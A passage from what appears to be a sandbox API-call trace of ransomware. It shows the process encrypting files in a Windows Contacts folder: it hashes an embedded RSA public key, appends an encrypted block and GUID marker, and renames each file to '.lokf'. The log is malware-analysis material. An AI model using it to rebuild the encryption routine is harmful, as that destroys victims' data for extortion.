dwFreeType=0x8000) returned 1 [0058.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0058.353] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0058.353] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned=".contact" [0058.353] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.354] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=1177) returned 1 [0058.354] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.356] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x473, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.356] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.358] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x499, lpOverlapped=0x0) returned 1 [0058.358] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.358] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.358] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.358] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.359] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.359] CryptHashData (hHash=0x327cb80, pbData=0x32947b0, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.359] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.359] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x32425c8, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x32425c8, pdwDataLen=0x9f4fa54) returned 1 [0058.359] GetLastError () returned 0x0 [0058.359] SetLastError (dwErrCode=0x0) [0058.359] GetLastError () returned 0x0 [0058.359] SetLastError (dwErrCode=0x0) [0058.359] GetLastError () returned 0x0 [0058.359] SetLastError (dwErrCode=0x0) [0058.359] GetLastError () returned 0x0 [0058.359] SetLastError (dwErrCode=0x0) [0058.359] GetLastError () returned 0x0 [0058.359] SetLastError (dwErrCode=0x0) [0058.359] GetLastError () returned 0x0 [0058.359] SetLastError (dwErrCode=0x0) [0058.359] GetLastError () returned 0x0 [0058.359] SetLastError (dwErrCode=0x0) [0058.359] GetLastError () returned 0x0 [0058.359] SetLastError (dwErrCode=0x0) [0058.359] GetLastError () returned 0x0 [0058.359] SetLastError (dwErrCode=0x0) [0058.359] GetLastError () returned 0x0 [0058.359] SetLastError (dwErrCode=0x0) [0058.360] GetLastError () returned 0x0 [0058.360] SetLastError (dwErrCode=0x0) [0058.360] GetLastError () returned 0x0 [0058.360] SetLastError (dwErrCode=0x0) [0058.360] GetLastError () returned 0x0 [0058.360] SetLastError (dwErrCode=0x0) [0058.360] GetLastError () returned 0x0 [0058.360] SetLastError (dwErrCode=0x0) [0058.360] GetLastError () returned 0x0 [0058.360] SetLastError (dwErrCode=0x0) [0058.360] GetLastError () returned 0x0 [0058.360] SetLastError (dwErrCode=0x0) [0058.360] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.360] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.360] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.360] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.360] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4a0) returned 0x32947b0 [0058.360] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0058.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257198 [0058.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x3294c58 [0058.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0058.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6a7e8 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216c20 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac20 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x3247810 [0058.361] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x3247810, Size=0x218) returned 0x3297a68 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297c88 [0058.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac20 | out: hHeap=0x660000) returned 1 [0058.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297c88 | out: hHeap=0x660000) returned 1 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac20 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x31cbc88 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3240c48 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6acc8 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x31cbce8 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbcc8 [0058.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbce8 | out: hHeap=0x660000) returned 1 [0058.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0058.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbc88 | out: hHeap=0x660000) returned 1 [0058.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac20 | out: hHeap=0x660000) returned 1 [0058.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0058.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.361] GetCurrentThreadId () returned 0x9e0 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x6c2660 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257390 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbc88 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbce8 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.362] GetCurrentThreadId () returned 0x9e0 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3294e50 [0058.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbc88 | out: hHeap=0x660000) returned 1 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3260e48 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbc88 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3247810 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbd08 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac20 [0058.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbd08 | out: hHeap=0x660000) returned 1 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbd08 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0058.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbd08 | out: hHeap=0x660000) returned 1 [0058.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbd08 [0058.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0058.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3240c48 [0058.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ace0 [0058.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbd08 | out: hHeap=0x660000) returned 1 [0058.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x31cbd08 [0058.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac50 [0058.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbd08 | out: hHeap=0x660000) returned 1 [0058.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6aba8 [0058.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ae00 [0058.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac50 | out: hHeap=0x660000) returned 1 [0058.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac50 [0058.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aba8 | out: hHeap=0x660000) returned 1 [0058.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0058.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbc88 | out: hHeap=0x660000) returned 1 [0058.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242608 [0058.363] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x499, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.363] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.364] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.364] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.364] CloseHandle (hObject=0x5cc) returned 1 [0058.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.364] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.lokf")) returned 1 [0058.367] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0058.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.371] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned=".ini" [0058.371] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0058.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.371] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned=".contact" [0058.371] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.372] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=1174) returned 1 [0058.372] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.374] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x470, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.374] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.376] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x496, lpOverlapped=0x0) returned 1 [0058.376] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.376] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.376] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.376] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.377] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.377] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 